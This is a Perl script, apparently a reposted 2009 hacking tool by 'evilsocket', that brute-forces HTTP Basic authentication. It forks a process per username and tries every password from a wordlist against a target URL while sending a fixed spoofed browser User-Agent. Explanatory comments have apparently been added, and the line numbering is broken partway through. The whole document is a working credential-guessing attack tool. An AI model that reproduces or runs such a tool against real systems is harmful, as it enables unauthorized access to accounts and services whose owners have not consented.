
Titolo: HTTP Authentication Bruteforcer Autore: evilsocket Data: 20.09.09 Numero Linee:   
  1. #!/usr/bin/perl
  2.  
  3. #################################################################
  4.  
  5. # HTTP Authentication Bruteforcer
  6.  
  7. #
  8.  
  9. # Coded by: evilsocket --- http://www.evilsocket.net
  10.  
  11. #
  12.  
  13. #################################################################
  14.  
  15.  
  16. use LWP::UserAgent;
  17. use Getopt::Std;
  18.  
  # Top-level script body: parse the command line, load the two word lists,
  # wait for the operator, then try every username/password pair against $url.
  #
  # These file-scope lexicals are shared with load_entries() and the loop below.
  my %options;
  my ( $users_file, $passw_file, $url );
  my @usernames;
  my @passwords;

  # `pid` is a bareword (the script never enables `use strict`), so this
  # stores that word as a string rather than a process id.
  my $main_pid = pid;

  banner();

  getopts( "u:p:h:", \%options );

  # -u, -p and -h are all mandatory; if any is missing, print the help and stop.
  unless ( defined( $options{u} ) and defined( $options{p} ) and defined( $options{h} ) ) {
      usage();
      exit 1;
  }

  ( $users_file, $passw_file, $url ) = @options{qw(u p h)};

  load_entries();

  print( "@ PRESS RETURN TO START BRUTEFORCING ...\n" );

  # Block until the operator presses return; the line that is read is unused.
  my $ignored = <STDIN>;

  print( "@ Starting bruteforcing against '$url' ...\n\n" );

  # One fork() per username; the child walks the whole password list.
  # Every attempt is a separate GET with Basic credentials (see
  # http_authenticate), so the target's access log records one request per
  # username/password pair, all within a short time window.
  foreach my $username (@usernames) {
      my $pid = fork();

      die( "@ ERROR : Could not fork child process !\n" ) unless defined($pid);

      # Parent: move on to the next username without waiting for the child.
      next if $pid != 0;

      foreach my $password (@passwords) {
          print "@ Trying '$username : $password' ...\n";
          next unless http_authenticate( $url, $username, $password );

          print( "\n@ SUCCESSFULLY AUTHENTICATED WITH '$username - $password' !!!!\n" );
          kill( 1, $main_pid );
      }

      # There is no exit here: a child that finishes its password list goes
      # on with the outer loop, so the process count is not bounded by the
      # number of usernames.
  }
  65.  
  # Print the tool's start-up banner to STDOUT. Takes no arguments.
  sub banner {
      my @banner_lines = (
          "\n*********************************************\n",
          "* HTTP Authentication Bruteforcer *\n",
          "* by evilsocket (http://www.evilsocket.net) *\n",
          "*********************************************\n\n",
      );

      # A single print of the list emits the same bytes as four separate prints.
      print(@banner_lines);
  }
  72.  
  # Print the command-line help to STDOUT: the three mandatory switches
  # (-u, -p, -h) followed by one example invocation. Takes no arguments.
  sub usage {
      my @help_lines = (
          "Usage : httpbrute.pl -u <users_file> -p <passwords_file> -h <HOST>\n\n",
          "\t<users_file> : File where to read usernames from .\n",
          "\t<passwords_file> : File where to read passwords from .\n",
          "\t<HOST> : Complete url to bruteforce .\n\n",
          "Example :\n\n",
          "\thttpbrute.pl -u usernames.txt -p passwords.txt -h http://192.168.1.1/\n",
      );

      print(@help_lines);
  }
  81.  
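  # Fill @usernames and @passwords from the files named by $users_file and
  # $passw_file (file-scope variables set from -u and -p), then print how
  # many entries were loaded.
  #
  # Dies with the system error text if either file cannot be opened.
  #
  # The files are opened with three-argument open() and lexical handles.
  # With the two-argument form the open mode is parsed out of the same string
  # as the file name, so characters in the -u / -p value could change how the
  # file is opened; passing the mode separately removes that ambiguity.
  sub load_entries {
      open( my $users_fh, '<', $users_file )
          or die( "@ ERROR : Could not open $users_file : $!\n" );
      push( @usernames, _read_entries($users_fh) );
      close($users_fh);

      open( my $passw_fh, '<', $passw_file )
          or die( "ERROR : Could not open $passw_file : $!\n" );
      push( @passwords, _read_entries($passw_fh) );
      close($passw_fh);

      # An array in string concatenation is evaluated in scalar context,
      # i.e. as its element count.
      print( "@ Loaded ".@usernames." usernames and ".@passwords." passwords .\n" );
  }

  # Read an open handle line by line and return the usable entries:
  # lines are chomped, and empty lines and lines starting with '#' are skipped.
  sub _read_entries {
      my ($fh) = @_;
      my @entries;

      while ( my $line = <$fh> ) {
          chomp($line);
          next if $line =~ /^\#/ or !length($line);
          push( @entries, $line );
      }

      return @entries;
  }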
  112.  
  # Send one GET request to $url with HTTP Basic credentials and report
  # whether the server accepted it.
  #
  #   $url       - URL to request
  #   $username  - user name placed in the Authorization header
  #   $password  - password placed in the Authorization header
  #
  # Returns whatever is_success() yields for the response object.
  #
  # The User-Agent is the same hard-coded string on every call, so all
  # requests made through this routine share that value in the target's
  # access log.
  sub http_authenticate {
      my ( $url, $username, $password ) = @_;

      my $ua = LWP::UserAgent->new;
      $ua->agent("Mozilla/4.5 [en] (Win95; U)");

      my $request = HTTP::Request->new( GET => $url );
      $request->authorization_basic( $username, $password );

      return $ua->request($request)->is_success;
  }
  127.  
  128.  

